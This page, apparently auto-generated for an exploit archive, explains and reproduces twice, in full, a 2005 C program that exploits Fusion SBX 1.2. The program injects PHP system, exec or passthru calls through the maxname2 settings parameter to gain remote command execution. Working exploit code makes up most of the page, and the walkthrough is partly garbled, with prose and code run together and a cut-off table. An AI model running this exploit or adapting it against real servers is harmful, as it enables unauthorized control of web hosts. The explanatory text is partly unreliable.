By exploitdb papers bot•May 20, 2005•
papers
Understanding Fusion SBX 1.2 Remote Command Execution Exploit
Understanding Fusion SBX 1.2 Remote Command Execution Exploit
What this paper is
This paper details a security vulnerability in Fusion SBX version 1.2 and provides a C exploit program to demonstrate remote command execution. The vulnerability allows an attacker to inject and execute arbitrary PHP functions on a vulnerable web server, effectively gaining control over the server with the privileges of the web server process.
Simple technical breakdown
The Fusion SBX software, when running version 1.2 or earlier, has a flaw in how it handles certain configuration settings. Specifically, it allows for the injection of malicious input into a variable that is then used to call a PHP function. The exploit crafts a special HTTP POST request that targets this vulnerability. By manipulating the maxname2 parameter in the request, the exploit can inject PHP code. This injected code then uses a chosen PHP function (system, exec, or passthru) to execute a command provided by the attacker via a GET parameter named sile.
Complete code and payload walkthrough
The provided C code is a client-side exploit that sends a crafted HTTP request to a vulnerable Fusion SBX installation.
/*****************************************************
* *
* [Fusion SBX <= 1.2] exploit *
* *
* sileFSBXxpl *
* *
* This exploit use vulnerability found into *
* Fusion SBX and create new variable and call it *
* with a malicious function (stored in config.php). *
* This exploit utilize injection of three diverse *
* procedures for execution of arbitrary code on *
* vulnerable machine with httpd privileges. *
* *
* References: www.securityfocus.org/bid/13575 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 10/05/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron-group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of web server- Header Comments: These comments provide metadata about the exploit, including its name (
sileFSBXxpl), the target software (Fusion SBX <= 1.2), the vulnerability type (Remote Command Execution), author, date, contact information, and licensing (GPL). - Includes: Standard C libraries for input/output (
stdio.h), general utilities (stdlib.h), system data types (sys/types.h), socket programming (sys/socket.h), internet address structures (netinet/in.h), and host name resolution (netdb.h). #define PORT 80: Defines the default HTTP port.
void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);- Function Prototypes: Declares the functions used in the program.
infodisplays usage instructions,bannershows the exploit's title,sendxplsends the actual exploit payload, and theerrfunctions handle specific error conditions.
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
if(argc!=4)
info();
type = atoi(argv[3]);
if(type < 1 || type > 3)
info();
banner();
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();
printf("[*] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]\n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);
printf("[*] Connecting at victim host [OK]\n");
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out,argv,type);
printf("[*] Now test at execute code on\n\n"
"[1] %s%sindex.php?sile=id\n"
"[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
shutdown(sock,2);
close(sock);
return 0;
}mainfunction:- Argument Check:
if(argc!=4) info();- Checks if the correct number of command-line arguments (4: program name, victim host, path, type) are provided. If not, it callsinfo()to display usage. - Exploit Type:
type = atoi(argv[3]); if(type < 1 || type > 3) info();- Converts the third argument (exploit type) to an integer and validates it (1, 2, or 3). - Banner:
banner();- Displays the exploit's title and author information. - Socket Creation:
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0) errsock();- Creates a TCP socket. If it fails,errsock()is called. - Host Resolution:
if((hp = gethostbyname(argv[1])) == NULL) errgeth();- Resolves the target hostname (argv[1]) to an IP address usinggethostbyname. If it fails,errgeth()is called. - Address Setup:
memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(PORT);- Initializes thesockaddr_instructure with the target IP address and port (default 80). - Connection:
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr)); if(sockconn < 0) errconn(argv);- Connects the socket to the target web server. If it fails,errconn()is called. - File Descriptor:
out = fdopen(sock,"a"); setbuf(out,NULL);- Converts the socket file descriptor into a file stream (FILE *) for easier writing and disables buffering to ensure immediate sending. - Exploit Sending:
sendxpl(out,argv,type);- Calls thesendxplfunction to construct and send the malicious HTTP request. - Output: Prints suggested URLs for testing the command execution.
- Cleanup:
shutdown(sock,2); close(sock);- Closes the socket connection.
- Argument Check:
void info(void){
system("clear");
printf("\n #########################################\n"
" # sileFSBXxpl #\n"
" # ################################### #\n"
" # Fusion SBX <= 1.2 exploit #\n"
" # Remote Command Execution #\n"
" # coded by Silentium #\n"
" # [ Anacron Group Italy ] #\n"
" # ################################### #\n"
" # www.autistici.org/anacron-group-italy #\n"
" #########################################\n\n"
" [Usage]\n\n"
" sileFSBXxpl <victim> <path_sbx> <type>\n\n"
" [Type]\n\n"
" 1) injection of system()\n"
" 2) injection of exec()\n"
" 3) injection of passthru()\n\n"
" [Example]\n\n"
" sileFSBXxpl www.victim.com /sbx/ 1\n\n");
exit(1);
}infofunction:- Clears the screen (
system("clear");). - Prints a detailed banner with the exploit's name, target, author, and contact information.
- Explains the command-line usage:
<victim>,<path_sbx>, and<type>. - Details the three exploit types corresponding to PHP functions:
system(),exec(), andpassthru(). - Provides an example usage.
- Exits the program.
- Clears the screen (
void banner(void){
system("clear");
printf("[-] sileFSBXxpl\n"
" ============\n"
"[-] Fusion SBX <= 1.2 exploit\n"
"[-] coded by Silentium - Anacron Group Italy\n"
"[-] www.autistici.org/anacron-group-italy\n\n");
}bannerfunction:- Clears the screen.
- Prints a concise banner with the exploit's name, target version, author, and website.
void sendxpl(FILE *out, char *argv[], int type){
char *call;
int size = 245;
if(type == 1)
call = "system";
else if(type == 2)
call = "exec";
else if(type == 3)
call = "passthru";
size+=strlen(call);
fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
"&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
printf("[*] Sending exploit [OK]\n\n");
}sendxplfunction:- Function Selection:
if(type == 1) call = "system"; else if(type == 2) call = "exec"; else if(type == 3) call = "passthru";- Sets acharpointercallto the name of the PHP function to be used based on thetypeargument. - Content-Length Calculation:
size+=strlen(call);- Adjusts thesizevariable to account for the length of the chosen function name. This is a rough calculation for theContent-Lengthheader. - HTTP POST Request Construction:
POST %sadmin/?settings HTTP/1.0\n: The request targets the/admin/?settingspath, which is likely an administrative interface for Fusion SBX.Host: %s\n: Specifies the target host.Content-Type: application/x-www-form-urlencoded\n: Indicates the body is URL-encoded form data.Content-Length: %d\n\n: The calculated length of the POST data.- POST Data:
set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1&setsubmit=Commit+Changes&is_logged=1\n\n- The critical part here is
maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29.%%3Bdecodes to;(semicolon).%%40decodes to@(at symbol).%sis where the chosen PHP function name (call) is inserted.%%28decodes to((opening parenthesis).%%24_GET%%5Bsile%%5Ddecodes to$GET[sile]. This refers to a GET parameter namedsile.
- Vulnerability Explanation: The Fusion SBX software likely takes the value of
maxname2and, due to improper sanitization or a logic flaw, uses it in a context where it can execute PHP code. The injected code30;@function_name($GET[sile])effectively tells PHP: "Execute the functionfunction_nameand pass it the value of thesileGET parameter." The30;part is likely to terminate any existing command or statement before executing the injected code.
- Exploit Sent Confirmation: Prints a message indicating the exploit has been sent.
- Function Selection:
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);
}errsockfunction:- Clears the screen.
- Prints an error message indicating socket creation failed.
- Exits the program.
void errgeth(void){
printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);
}errgethfunction:- Prints an error message indicating host resolution failed.
- Exits the program.
void errconn(char *argv[]){
printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);
}
// milw0rm.com [2005-05-20]errconnfunction:- Prints an error message indicating connection to the victim host failed.
- Exits the program.
- Comment:
// milw0rm.com [2005-05-20]- Credits the source of the exploit.
Payload/Shellcode Explanation:
There is no explicit shellcode in the traditional sense (raw machine code bytes). Instead, the "payload" is the crafted HTTP POST request. The actual code execution happens on the server-side within the PHP interpreter.
The injected PHP code is: 30;@function_name($GET[sile])
30: This is likely a numerical value. In the context of themaxname2parameter, it might be intended to set a maximum name length or a similar configuration.;: This is a PHP statement terminator. It ensures that whatever might have been before this injection is properly ended, and the new code starts as a separate statement.@: This is the PHP error control operator. It suppresses any error messages that might be generated by the function call. This is useful for making the exploit quieter.function_name: This is a placeholder for one of the chosen PHP functions:system,exec, orpassthru, determined by thetypeargument passed to the C exploit.($GET[sile]): This is the argument passed to the chosen PHP function.$GET[sile]refers to the value of thesileparameter in the HTTP GET request.
Execution Flow:
- The C exploit connects to the target web server.
- It sends a crafted HTTP POST request to
/admin/?settings. - The POST data includes a specially formatted
maxname2parameter:30;@chosen_function($GET[sile]). - The vulnerable Fusion SBX application processes this request. It incorrectly sanitizes or directly uses the
maxname2value in a way that triggers PHP code execution. - The PHP interpreter on the server executes
chosen_function(value_from_sile_GET_parameter). - The attacker can then send a subsequent GET request to a URL like
http://victim.com/path_to_sbx/index.php?sile=command_to_execute(oradmin/index.phpdepending on the path and exploit type) to see the output of their command.
Mapping of Code Fragments to Practical Purpose:
| Code Fragment/Block
Original Exploit-DB Content (Verbatim)
/*****************************************************
* *
* [Fusion SBX <= 1.2] exploit *
* *
* sileFSBXxpl *
* *
* This exploit use vulnerability found into *
* Fusion SBX and create new variable and call it *
* with a malicious function (stored in config.php). *
* This exploit utilize injection of three diverse *
* procedures for execution of arbitrary code on *
* vulnerable machine with httpd privileges. *
* *
* References: www.securityfocus.org/bid/13575 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 10/05/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron-group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of web server
void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
if(argc!=4)
info();
type = atoi(argv[3]);
if(type < 1 || type > 3)
info();
banner();
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();
printf("[*] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]\n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);
printf("[*] Connecting at victim host [OK]\n");
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out,argv,type);
printf("[*] Now test at execute code on\n\n"
"[1] %s%sindex.php?sile=id\n"
"[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
shutdown(sock,2);
close(sock);
return 0;
}
void info(void){
system("clear");
printf("\n #########################################\n"
" # sileFSBXxpl #\n"
" # ################################### #\n"
" # Fusion SBX <= 1.2 exploit #\n"
" # Remote Command Execution #\n"
" # coded by Silentium #\n"
" # [ Anacron Group Italy ] #\n"
" # ################################### #\n"
" # www.autistici.org/anacron-group-italy #\n"
" #########################################\n\n"
" [Usage]\n\n"
" sileFSBXxpl <victim> <path_sbx> <type>\n\n"
" [Type]\n\n"
" 1) injection of system()\n"
" 2) injection of exec()\n"
" 3) injection of passthru()\n\n"
" [Example]\n\n"
" sileFSBXxpl www.victim.com /sbx/ 1\n\n");
exit(1);
}
void banner(void){
system("clear");
printf("[-] sileFSBXxpl\n"
" ============\n"
"[-] Fusion SBX <= 1.2 exploit\n"
"[-] coded by Silentium - Anacron Group Italy\n"
"[-] www.autistici.org/anacron-group-italy\n\n");
}
void sendxpl(FILE *out, char *argv[], int type){
char *call;
int size = 245;
if(type == 1)
call = "system";
else if(type == 2)
call = "exec";
else if(type == 3)
call = "passthru";
size+=strlen(call);
fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
"&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
printf("[*] Sending exploit [OK]\n\n");
}
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);
}
void errgeth(void){
printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);
}
void errconn(char *argv[]){
printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);
}
// milw0rm.com [2005-05-20]